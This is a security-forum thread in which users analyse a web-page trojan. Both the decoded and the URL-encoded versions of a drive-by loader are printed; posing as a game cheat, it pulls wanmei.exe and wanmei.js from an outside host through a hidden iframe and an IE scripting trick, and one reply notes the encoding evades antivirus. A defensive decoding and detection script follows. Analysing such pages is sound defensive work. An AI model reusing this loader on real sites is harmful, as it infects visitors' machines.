Forum: Virus Zone    Title: About web-page trojans~~!!
Author: kenny [kenny99]    Forum user
http://wo595123.nease.net/
Could someone take a look at this website for me? It carries a trojan and I can't figure it out. Many websites are linked to it, for example 867.126.com and 9493.126.com.
Please send the source code to my mailbox, thank you very much. 啊Q, help me, I'm out of options. I have tried many methods and just can't work out what is going on. You can also add me on QQ: 64336113 to discuss it. Thanks.


[This post was edited by kenny (kenny99) on 10-05 at 22:52]

Original post    Posted: 04-10-05 20:03

Reply: kailangq [kailangq]   Moderator
Every time I end up testing the poison on myself, it makes me dizzy.


--------------------------------------------------------------------------------
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words ="<HTML><HEAD><META http-equiv=Content-Type content="text/html; charset=gb2312"><TITLE>2004最新版大话西游2烧法外挂!自动捕捉修罗!点击对话框~  </TITLE></HEAD><BODY oncontextmenu="return false" onselectstart="return false" scroll="no" topmargin="0" leftmargin="0"><SCRIPT LANGUAGE="EARTHSIMULATOR" src="http://wo595123.nease.net/wanmei.exe"></SCRIPT><SCRIPT LANGUAGE="javascript">jsurl="http://wo595123.nease.net/wanmei.js".replace(/\//g,'//');WIE=navigator.appVersion;if(WIE.indexOf("MSIE 5.0")>-1){document.write("<iframe style='display:none;' name='EARTHSIMULATOR' src='newtimes://'></iframe>");setTimeout("muma0()",1000);}else {window.open("newtimes://","_search");setTimeout("muma1()",1000);}function muma0(){window.open("file:javascript:document.all.tags('SCRIPT')[0].src='"+jsurl+"';eval();","EARTHSIMULATOR");}function muma1(){window.open("file:javascript:document.all.tags('SCRIPT')[0].src='"+jsurl+"';eval();","_search");}</SCRIPT></BODY></HTML>
"
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>
--------------------------------------------------------------------------------

Note the part in red: it uses script to plant the wanmei.exe and wanmei.js trojans.


Reply B1    Posted: 04-10-06 00:52

Reply: kenny [kenny99]   Forum user
Thanks for your reply, I understand now.

Reply B2    Posted: 04-10-07 00:52

Reply: darken [darken]   Forum user
Why is the code I see different from yours? What I see is:
<HTML>
<HEAD>
<SCRIPT LANGUAGE="Javascript">
<!--
var Words ="%3CHTML%3E%3CHEAD%3E%3CMETA%20http%2Dequiv%3DContent%2DType%20content%3D%22text%2Fhtml%3B%20charset%3Dgb2312%22%3E%3CTITLE%3E2004%u6700%u65B0%u7248%u5927%u8BDD%u897F%u6E382%u70E7%u6CD5%u5916%u6302%uFF01%u81EA%u52A8%u6355%u6349%u4FEE%u7F57%uFF01%u70B9%u51FB%u5BF9%u8BDD%u6846%7E%20%20%3C%2FTITLE%3E%3C%2FHEAD%3E%3CBODY%20oncontextmenu%3D%22return%20false%22%20onselectstart%3D%22return%20false%22%20scroll%3D%22no%22%20topmargin%3D%220%22%20leftmargin%3D%220%22%3E%3CSCRIPT%20LANGUAGE%3D%22EARTHSIMULATOR%22%20src%3D%22http%3A%2F%2Fwo595123%2Enease%2Enet%2Fwanmei%2Eexe%22%3E%3C%2FSCRIPT%3E%3CSCRIPT%20LANGUAGE%3D%22javascript%22%3Ejsurl%3D%22http%3A%2F%2Fwo595123%2Enease%2Enet%2Fwanmei%2Ejs%22%2Ereplace%28%2F%5C%2F%2Fg%2C%27%2F%2F%27%29%3BWIE%3Dnavigator%2EappVersion%3Bif%28WIE%2EindexOf%28%22MSIE%205%2E0%22%29%3E%2D1%29%7Bdocument%2Ewrite%28%22%3Ciframe%20style%3D%27display%3Anone%3B%27%20name%3D%27EARTHSIMULATOR%27%20src%3D%27newtimes%3A%2F%2F%27%3E%3C%2Fiframe%3E%22%29%3BsetTimeout%28%22muma0%28%29%22%2C1000%29%3B%7Delse%20%7Bwindow%2Eopen%28%22newtimes%3A%2F%2F%22%2C%22%5Fsearch%22%29%3BsetTimeout%28%22muma1%28%29%22%2C1000%29%3B%7Dfunction%20muma0%28%29%7Bwindow%2Eopen%28%22file%3Ajavascript%3Adocument%2Eall%2Etags%28%27SCRIPT%27%29%5B0%5D%2Esrc%3D%27%22%2Bjsurl%2B%22%27%3Beval%28%29%3B%22%2C%22EARTHSIMULATOR%22%29%3B%7Dfunction%20muma1%28%29%7Bwindow%2Eopen%28%22file%3Ajavascript%3Adocument%2Eall%2Etags%28%27SCRIPT%27%29%5B0%5D%2Esrc%3D%27%22%2Bjsurl%2B%22%27%3Beval%28%29%3B%22%2C%22%5Fsearch%22%29%3B%7D%3C%2FSCRIPT%3E%3C%2FBODY%3E%3C%2FHTML%3E%0D%0A"
function SetNewWords()
{
var NewWords;
NewWords = unescape(Words);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>
</HEAD>
<BODY>
</BODY>
</HTML>


Reply B3    Posted: 04-10-07 12:26

Reply: wincss [wincss]   Forum user
What you are seeing is the encrypted code; his code is the decrypted version.

Reply B4    Posted: 04-10-07 15:57

Reply: lijingxi [lijingxi]   Trainee moderator
The poster above is right! The site's code is encrypted!
This method can also get past some antivirus software!

Reply B5    Posted: 04-10-12 08:29
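
Replies B1 and B3 show the same page after and before its `unescape()` string is decoded. The following added example, which is not code from the thread, performs that decoding statically in Node.js without running the page and reports a few traits of the decoded markup; the function names, the rule names and the `example.invalid` sample are assumptions constructed for illustration.

```javascript
// Added example: static triage of a page that hides markup behind unescape().
// Nothing is evaluated or fetched; strings are only decoded and searched.

// Decode the two escape forms unescape() accepts: %uXXXX and %XX.
function decodeUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (_, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Collect string literals assigned to a variable that is later passed to unescape().
function extractEncodedStrings(html) {
  const re = /var\s+(\w+)\s*=\s*"((?:%u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2}|[\w.*@+\/-])+)"/g;
  const out = [];
  for (const m of html.matchAll(re)) {
    if (new RegExp("unescape\\(\\s*" + m[1] + "\\s*\\)").test(html)) out.push(m[2]);
  }
  return out;
}

// Hypothetical rule names; each pattern mirrors a trait of the decoded page in this thread.
const RULES = [
  ["script-src-executable", /<script[^>]+src\s*=\s*["']?[^"'\s>]+\.exe\b/i],
  ["hidden-iframe", /<iframe[^>]+display\s*:\s*none/i],
  ["context-menu-disabled", /oncontextmenu\s*=\s*["']?return false/i],
];

// Decode every wrapped string in the page and list which rules its markup matches.
function triage(html) {
  return extractEncodedStrings(html).map((enc) => {
    const decoded = decodeUnescape(enc);
    const hits = RULES.filter(([, re]) => re.test(decoded)).map(([name]) => name);
    return { decoded, hits };
  });
}

// Constructed sample (not the page from the thread); example.invalid is a placeholder host.
const ENCODED = "%3CHTML%3E%3CTITLE%3E%u6D4B%u8BD5%3C%2FTITLE%3E" +
  "%3CBODY%20oncontextmenu%3D%22return%20false%22%3E" +
  "%3CSCRIPT%20src%3D%22http%3A%2F%2Fexample%2Einvalid%2Fsample%2Eexe%22%3E" +
  "%3C%2FSCRIPT%3E%3C%2FBODY%3E%3C%2FHTML%3E";
const SAMPLE_PAGE = '<SCRIPT LANGUAGE="Javascript">\nvar Words ="' + ENCODED + '"\n' +
  "function SetNewWords(){ document.write(unescape(Words)); }\nSetNewWords();\n</SCRIPT>";

for (const f of triage(SAMPLE_PAGE)) {
  console.log(f.hits.join(", ") || "no indicators");
  console.log(f.decoded);
}
```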

Copyright 20CN Network Security Group
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.